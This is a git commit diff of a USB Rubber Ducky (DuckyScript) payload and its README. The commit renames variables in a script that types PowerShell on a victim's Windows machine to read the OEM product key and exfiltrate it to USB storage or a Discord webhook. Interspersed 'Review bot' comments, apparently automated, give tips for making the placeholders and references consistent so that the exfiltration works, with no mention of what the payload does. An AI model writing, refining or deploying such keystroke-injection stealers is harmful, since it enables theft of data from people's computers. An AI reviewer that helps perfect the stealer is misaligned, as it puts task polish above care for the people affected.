from - to _

pull/400/head
Alessandro Greco 2024-08-20 12:27:36 +02:00
parent e595d71ac3
commit c895160753
2 changed files with 7 additions and 7 deletions


@ -32,7 +32,7 @@ Tested on:
This portion of the payload serves as a user-defined configuration section where you should input your Discord Webhook URL. You should replace "example.com" with the actual Discord Webhook URL you want to use. The Webhook URL is the endpoint where your payload will send the acquired information related to the Windows Product Key, as well as its type, for exfiltration to a specified Discord channel or server. It's a crucial part of the payload that connects the data extraction process to your Discord platform for further analysis or actions.
```DuckyScript
DEFINE #DISCORD-WEBHOOK example.com
DEFINE #DISCORD_WEBHOOK example.com
```
## Payload Description
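Review bot: The placeholder on the renamed `DEFINE #DISCORD_WEBHOOK example.com` line is still a bare host, while the sentence above it tells the reader to supply a full Discord Webhook URL. Since the line is being touched anyway, consider writing the placeholder in the same URL form the payload's REM hint uses (`https://discord.com/api/webhooks/...`) so the README and the payload agree on what a valid value looks like. The commit message "from - to _" also does not say what problem the hyphenated names caused; one sentence on that would help whoever reads the history later.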


@ -11,14 +11,14 @@ REM_BLOCK
END_REM
REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg...
DEFINE #DISCORD-WEBHOOK example.com
DEFINE #DISCORD_WEBHOOK example.com
REM_BLOCK
How would you prefer to do the exfiltration?
Via Discord Webhooks or via Rubber Ducky USB storage?
If you prefer to use the storage offered by USB Rubber Ducky, set the boolean variable #USB-RUBBER-DUCKY-STORAGE to TRUE, otherwise set it to FALSE and the alternative mode will be automatically selected, so via Discord Webhook.
If you prefer to use the storage offered by USB Rubber Ducky, set the boolean variable #USB_RUBBER_DUCKY_STORAGE to TRUE, otherwise set it to FALSE and the alternative mode will be automatically selected, so via Discord Webhook.
END_REM
DEFINE #USB-RUBBER-DUCKY-STORAGE TRUE
DEFINE #USB_RUBBER_DUCKY_STORAGE TRUE
EXTENSION DETECT_READY
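Review bot: The REM line above `DEFINE #DISCORD_WEBHOOK example.com` does not say that the value is only read when `#USB_RUBBER_DUCKY_STORAGE` is FALSE, and the default here is TRUE with the webhook left at the placeholder. The REM_BLOCK and the DEFINE are renamed together, which keeps comment and code in sync, but a short note in the REM_BLOCK that the webhook define must be filled in before switching the storage flag to FALSE would make the dependency between the two settings explicit.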
@ -57,15 +57,15 @@ DELAY 2000
STRINGLN $key_detected=$(wmic path softwarelicensingservice get OA3xOriginalProductKey)+$(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription);
IF_DEFINED_TRUE #USB-RUBBER-DUCKY-STORAGE
IF_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
STRINGLN
$m=(Get-Volume -FileSystemLabel 'DUCK').DriveLetter;
echo $key_detected >> ${m}:\exfiltration.txt
END_STRINGLN
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #USB-RUBBER-DUCKY-STORAGE
IF_NOT_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
STRINGLN
$hookUrl = "#DISCORD-WEBHOOK"
$hookUrl = "#DISCORD_WEBHOOK"
$exfiltration = @"$key_detected"@
$payload = [PSCustomObject]@{
content = $exfiltration
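Review bot: The three references in this hunk (`IF_DEFINED_TRUE`, `IF_NOT_DEFINED_TRUE` and `$hookUrl = "#DISCORD_WEBHOOK"`) only work if they match the DEFINE names character for character, so it is worth confirming that no hyphenated name survives outside the diff context. The seven renamed lines visible across the hunks match the "7 additions and 7 deletions" in the summary, but an occurrence that was missed would be an unchanged line and would not appear in the diff at all; a search of both files for `#DISCORD-WEBHOOK` and `#USB-RUBBER-DUCKY-STORAGE` before merging would settle it.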